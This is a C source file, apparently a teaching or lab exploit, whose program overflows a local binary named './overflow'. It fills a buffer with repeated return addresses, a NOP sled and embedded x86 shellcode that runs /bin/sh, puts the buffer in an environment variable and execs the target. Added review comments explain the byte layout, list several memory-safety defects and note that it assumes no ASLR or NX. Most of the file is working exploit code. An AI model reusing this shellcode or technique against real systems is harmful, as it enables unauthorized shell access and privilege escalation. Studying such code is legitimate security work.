/*
 * main.c
 *
 *  Created on: 27.01.2012
 *      Author: druid
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <string.h>

#define PATH_CT "./overflow"
#define ENV_VAR "EXPLOIT"
#define NOP 0x90


/*
 * Hard-coded 32-bit x86 machine code, stored as a C string; the tail bytes
 * (0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68) spell "/bin/sh".  main() copies it
 * with strlen(), which only works because no byte in the literal is 0x00.
 * NOTE(review): treated as an opaque byte string here; it is architecture-
 * and ABI-specific and is not decoded further in this file.
 */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

/*
 * Reads the current stack pointer (32-bit x86 only: uses %esp/%eax).
 *
 * There is no C return statement.  The basic asm moves %esp into %eax and the
 * function relies on %eax being the integer return register of the 32-bit
 * calling convention.  Reaching the closing brace of a non-void function and
 * using the result is undefined behaviour, and the compiler is not told that
 * the asm writes %eax, so the returned value is not guaranteed by the language;
 * it is also meaningless on 64-bit builds.
 *
 * NOTE(review): main() subtracts a fixed offset from this value, which only
 * yields anything useful if the target's stack placement is predictable
 * (i.e. no ASLR) — cannot be confirmed from this file.
 */
u_long
esp()
{
  __asm__("movl %esp, %eax");
}

/*
 * Fills a buffer with a fixed layout, exports it as the environment variable
 * ENV_VAR and replaces this process with PATH_CT via execl().
 *
 * Byte layout written into buf (byte offsets, half-open ranges):
 *   [0, 18)     "/usr/bin/pico;   " plus its '\0', copied with strcpy()
 *   [16, 144)   esp() - 192 as a u_long, repeated every 4 bytes (32 copies);
 *               this overwrites the strcpy() terminator at offset 17
 *   [144, 1040) 0x90 bytes (the NOP macro above is defined but not used here)
 *   [1040, ...) the bytes of shellcode, followed by a single '\n'
 *
 * Defects visible in this block, left unchanged because the result depends on
 * the exact stack layout of this function:
 *   - buf is 1032 bytes, but the second and third loops write up to index
 *     1040 + strlen(shellcode), and the '\n' one past that: out-of-bounds
 *     stack writes (undefined behaviour; -fsanitize=address reports them).
 *   - no '\0' is written after the final '\n', so setenv() reads until the
 *     first zero byte it happens to find beyond the array.
 *   - buf + i is cast to u_long * (misaligned access and effective-type
 *     violation), and `i < strlen(shellcode)` compares int with size_t.
 *   - buf is u_char[] but setenv() takes const char *; no cast is applied.
 *   - setenv() and execl() return values are not checked; if execl() fails,
 *     control falls off the end of main().
 *
 * NOTE(review): the fixed esp() - 192 offset and the 0x90 filler presume
 * that the target's stack address is predictable and that its stack is
 * executable (32-bit, no ASLR, no NX, no stack protector).  None of that is
 * established by this file.
 */
int
main()
{

  u_char buf[1032];
  u_long addr;
  int i;

  strcpy(buf, "/usr/bin/pico;   ");

  addr = esp() - 192;
  for (i = 16; i < 128 + 16; i += 4)
    *((u_long *) (buf + i)) = addr;
  for (i = 128 + 16; i < 1040; i++)
    buf[i] = 0x90;
  for (i = 0; i < strlen(shellcode); i++)
    buf[1040 + i] = shellcode[i];
  buf[1040 + i] = '\n';

  setenv(ENV_VAR, buf, 1);
  execl(PATH_CT, "overflow", (char *) 0);
}